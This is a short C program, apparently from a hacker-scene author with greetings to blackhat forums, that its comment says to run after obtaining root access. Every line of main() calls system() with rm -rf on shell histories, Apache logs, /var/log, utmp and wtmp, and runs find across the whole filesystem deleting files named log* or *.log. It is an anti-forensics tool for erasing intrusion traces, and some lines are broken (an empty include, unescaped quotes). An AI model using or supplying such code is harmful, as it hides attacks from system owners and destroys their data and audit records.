log-cleaner.c

[begin]
/*simple code deleting logs from linux please use it after you enter the root access
c0d3r : kiddies A.k.A peneter
email : kecoak2004[at]yahoo[dot]com
visit : http://devilz-kiddies.blogspot.com/
http://kiddiescode.wordpress.com/
inspirate :mywisdom
greetz:mywisdom,gunslinger_,xtr0nic,whitehat,flyff666,petimati
isa muhammad said,patriot,cruz3n,n4p5t3r(Founder of anti social community)and you...

greetz:devilzc0de crews n members, ycl,jasakom,anti-jasakom,kecoak-elektronik
anti-social(my private community),leetcoder,voidnetwork,codecall, darkc0de (missing forum n real blackhat forum) n soon..

special thanks:vera you always be mine and otherhand..thanks you always beside me
when im happy,sad and down..love you honey*/

#include
int main()
{
system("rm -rf /tmp/logs");
system("rm -rf $HISTFILE");
system("rm -rf /root/.ksh_history");
system("rm -rf /root/.bash_history");
system("rm -rf /root/.ksh_history");
system("rm -rf /root/.bash_logout");
system("rm -rf /usr/local/apache/logs");
system("rm -rf /usr/local/apache/log");
system("rm -rf /var/apache/logs");
system("rm -rf /var/apache/log");
system("rm -rf /var/run/utmp");
system("rm -rf /var/logs");
system("rm -rf /var/log");
system("rm -rf /var/adm");
system("rm -rf /etc/wtmp");
system("rm -rf /etc/utmp");
system("find / -name *.bash_history -exec rm -rf {}");
system("find / -name *.bash_logout -exec rm -rf {}");
system("find / -name "log*" -exec rm -rf {}");
system("find / -name *.log -exec rm -rf {}");
}
[EOF]